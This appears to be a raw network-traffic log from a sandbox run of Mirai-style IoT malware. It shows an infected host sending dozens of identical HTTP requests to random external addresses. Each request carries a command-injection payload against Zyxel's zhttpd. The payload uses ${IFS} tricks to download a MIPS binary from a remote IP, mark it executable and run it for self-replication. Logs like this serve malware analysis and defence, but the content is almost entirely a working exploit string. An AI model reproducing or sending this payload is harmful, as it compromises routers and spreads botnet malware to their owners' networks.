                                                      Feb 2, 2024 06:35:43.425954103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2089192.168.2.145378071.219.175.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426006079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2090192.168.2.1439252106.156.137.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426032066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2091192.168.2.143409493.168.83.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426084995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2092192.168.2.1435030194.34.240.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426126957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2093192.168.2.1442080210.77.124.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426179886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2094192.168.2.1446112126.215.220.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426213026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2095192.168.2.1456054123.207.141.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426273108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2096192.168.2.1460070210.235.109.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426307917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2097192.168.2.1445218144.85.229.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426376104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2098192.168.2.1458158160.82.188.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426395893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2099192.168.2.145969865.254.182.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426479101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2100192.168.2.144528277.13.239.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426481962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2101192.168.2.1458462145.101.64.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426500082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2102192.168.2.1454342108.208.74.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426572084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2103192.168.2.1454252124.196.25.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426600933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2104192.168.2.1432828103.51.93.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426661015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2105192.168.2.1458434192.182.170.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426728964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2106192.168.2.144562293.65.37.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426753998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2107192.168.2.1446974124.78.104.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426801920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2108192.168.2.144186635.84.217.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426820993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2109192.168.2.1434280159.10.226.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426908970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2110192.168.2.145806461.70.164.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426971912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2111192.168.2.1455892206.138.131.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.426996946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2112192.168.2.144552862.122.14.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427017927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2113192.168.2.1447898150.165.49.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427018881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2114192.168.2.1440192153.105.60.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427095890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2115192.168.2.1455950130.219.232.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427136898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2116192.168.2.14609325.154.57.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427180052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2117192.168.2.144683489.233.46.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427217960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2118192.168.2.145652858.137.79.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427325964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2119192.168.2.145556681.179.228.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427352905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2120192.168.2.1456086136.177.174.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427372932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2121192.168.2.144437477.24.12.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427407980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2122192.168.2.144430453.250.14.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427449942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2123192.168.2.1449118170.255.90.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427505016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2124192.168.2.1450416179.123.46.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427580118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2125192.168.2.144997224.186.162.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427618027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2126192.168.2.1438566200.25.119.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427649975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2127192.168.2.1458948193.8.249.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427707911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2128192.168.2.144037276.135.54.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427736998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2129192.168.2.143933252.246.56.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427742004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2130192.168.2.1441010117.143.234.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427762985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2131192.168.2.1434576111.4.155.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427839994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2132192.168.2.144812266.161.164.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427886963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2133192.168.2.1454564192.172.246.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427907944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2134192.168.2.1444540202.123.129.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.427948952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2135192.168.2.144302289.15.183.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428028107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2136192.168.2.143387877.176.236.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428066015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2137192.168.2.1435190217.147.30.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428123951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2138192.168.2.144674437.179.91.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428158045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2139192.168.2.1451696141.163.82.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428209066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2140192.168.2.1434948179.183.86.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428257942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2141192.168.2.1436798151.249.238.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428287983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2142192.168.2.144052235.185.181.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428304911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2143192.168.2.1448480143.115.239.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428342104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2144192.168.2.144455241.98.55.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428386927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2145192.168.2.144574675.195.37.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428421021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2146192.168.2.143886447.56.46.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428456068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2147192.168.2.144990281.255.80.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428524971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2148192.168.2.1460470173.229.229.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428538084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2149192.168.2.145241859.62.19.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428649902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2150192.168.2.1444848205.228.85.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.428685904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2151192.168.2.143915243.78.240.197443
                                                      TimestampBytes transferredDirectionData
